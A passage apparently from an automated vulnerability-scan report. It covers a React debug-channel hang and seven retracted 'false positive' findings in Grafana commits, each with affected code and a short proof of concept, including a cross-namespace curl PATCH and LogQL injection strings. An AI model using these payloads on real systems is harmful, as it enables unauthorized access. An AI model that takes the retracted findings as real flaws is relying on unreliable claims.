debugChannel !== undefined,

Proof of Concept

// Server-side: Pass a write-only debug channel (no readable side)
const { Writable } = require('stream');
const writeOnlyChannel = new Writable({ write() {} });
renderToPipeableStream(component, { debugChannel: writeOnlyChannel });
// Client will now block forever waiting for debug data that cannot be read
❌ Corrections & Retractions (7)

⚠️ MEDIUM FALSE POSITIVE Path Traversal

Commit: 193f6f1

Author: Costa Alexoglou

The script used relative paths without proper directory resolution, allowing an attacker to execute the script from a different working directory and cause certificates to be written to unintended locations. This could lead to certificate files being created in arbitrary directories or overwriting existing files.

🔍 View Affected Code & PoC

Affected Code

rm -rf data/grafana-aggregator
mkdir -p data/grafana-aggregator
openssl req -nodes -new -x509 -keyout data/grafana-aggregator/ca.key

Proof of Concept

cd /tmp && /path/to/grafana/hack/make-aggregator-pki.sh - This would create certificates in /tmp/data/grafana-aggregator/ instead of the intended repo location, potentially overwriting files or bypassing access controls in the /tmp directory.

🔥 HIGH FALSE POSITIVE Authorization Bypass

Commit: aac8061

Author: Tania

The code was performing namespace validation for all provider types, but the static provider (which serves local configuration) should not enforce namespace restrictions. This created an authorization bypass where users could access feature flags from other organizations by using the static provider endpoint with mismatched namespaces.

🔍 View Affected Code & PoC

Affected Code

valid, ns := b.validateNamespace(r)
if !valid {
	http.Error(w, namespaceMismatchMsg, http.StatusUnauthorized)
	return
}

Proof of Concept

An attacker authenticated to org-1 could access feature flags intended for org-2 by making requests to the static provider endpoints (when providerType is not FeaturesServiceProviderType or OFREPProviderType) with org-2's namespace in the URL path, bypassing the namespace validation that should prevent cross-organization access.

⚠️ MEDIUM FALSE POSITIVE State Modification via Dry-Run Bypass

Commit: ccaf868

Author: Igor Suleymanov

The dual-writer storage system was not properly handling dry-run operations, allowing state modifications and side effects (like permission changes) to occur when they should only validate without making changes. This violates the dry-run contract where operations must be read-only.

🔍 View Affected Code & PoC

Affected Code

// Before patch - no dry-run check in Create method
func (d *dualWriter) Create(ctx context.Context, in runtime.Object, createValidation rest.ValidateObjectFunc, options *metav1.CreateOptions) (runtime.Object, error) {
    // ... proceeds to modify both legacy and unified storage even during dry-run

Proof of Concept

POST /api/v1/folders
Content-Type: application/json
Dry-Run: All

{"metadata":{"name":"test-folder"},"spec":{"title":"Test Folder"}}

# Before patch: This would create actual folder and modify permissions despite dry-run flag
# After patch: This only validates without side effects

🔥 HIGH FALSE POSITIVE Authorization Bypass

Commit: eda64c6

Author: Costa Alexoglou

The code incorrectly assigned key functions for namespaced and cluster-scoped resources, causing namespaced resources to use cluster-scoped key functions and vice versa. This could allow unauthorized access to resources across namespace boundaries by manipulating resource keys.

🔍 View Affected Code & PoC

Affected Code

if isNamespaced {
    statusStore.Store.KeyFunc = grafanaregistry.NamespaceKeyFunc(gr)
    statusStore.Store.KeyRootFunc = grafanaregistry.KeyRootFunc(gr)
} else {
    statusStore.Store.KeyFunc = grafanaregistry.ClusterScopedKeyFunc(gr)

Proof of Concept

curl -X PATCH 'http://localhost:3000/apis/advisor.grafana.app/v0alpha1/namespaces/admin-namespace/checks/sensitive-check/status' -H 'Content-Type: application/json-patch+json' -u 'low-priv-user:password' -d '[{"op": "replace", "path": "/status", "value": {"compromised": true}}]' - This would allow a low-privileged user to modify status of resources in other namespaces due to incorrect key function assignment.

⚠️ MEDIUM FALSE POSITIVE Query Injection

Commit: 9be63b1

Author: Steve Simpson

The code added validation for alert label matchers to prevent query injection in LogQL queries. Before the patch, malicious label names or matcher types could be injected into the LogQL query string without proper validation, potentially allowing attackers to manipulate the query structure.

🔍 View Affected Code & PoC

Affected Code

logql += fmt.Sprintf(` | alert_labels_%s %s %q`, matcher.Label, matcher.Type, matcher.Value)

Proof of Concept

POST request with Labels: [{"Type": "| json | drop", "Label": "severity", "Value": "critical"}] or Labels: [{"Type": "=", "Label": "test\" = \"injected\"", "Value": "value"}] to inject arbitrary LogQL operators and manipulate the query structure

⚠️ MEDIUM FALSE POSITIVE Information Disclosure

Commit: 14ee584

Author: Tom Ratcliffe

The code previously only allowed admin users to see team folder owners, but the patch changes this to allow any user with 'teams:read' permission to see folder owners. This creates an information disclosure vulnerability where users with lower privileges can access team ownership information they shouldn't be able to see.

🔍 View Affected Code & PoC

Affected Code

const isAdmin = contextSrv.hasRole('Admin') || contextSrv.isGrafanaAdmin;
{isAdmin && config.featureToggles.teamFolders && folderDTO && 'ownerReferences' in folderDTO && (
  <FolderOwners ownerReferences={folderDTO.ownerReferences} />
)}

Proof of Concept

1. Create a user account without admin privileges but with 'teams:read' permission
2. Navigate to a team folder that has owner references
3. Before patch: Owner information is hidden
4. After patch: Owner information is now visible, disclosing team membership and folder ownership data that was previously restricted to admins only

⚠️ MEDIUM FALSE POSITIVE Race Condition / Optimistic Locking Bypass

Commit: 57b75b4

Author: Will Assis

The code had a race condition in optimistic locking implementation where concurrent operations could bypass resource version checks. The original implementation would rollback changes after transaction commit, creating a window where conflicting writes could succeed simultaneously. The patch fixes this by performing conflict detection during the transaction using proper WHERE clauses with resource version constraints.

🔍 View Affected Code & PoC

Affected Code

DELETE FROM resource
WHERE group = ? AND resource = ? AND namespace = ? AND name = ?;
-- Missing resource_version check in WHERE clause

Proof of Concept

1. Client A reads resource with RV=100
2. Client B reads same resource with RV=100
3. Client A updates resource (RV becomes 101)
4. Client B deletes resource using old RV=100
5. Both operations succeed due to missing RV constraint in DELETE/UPDATE queries, allowing Client B to delete a resource that was modified after they read it, violating optimistic concurrency control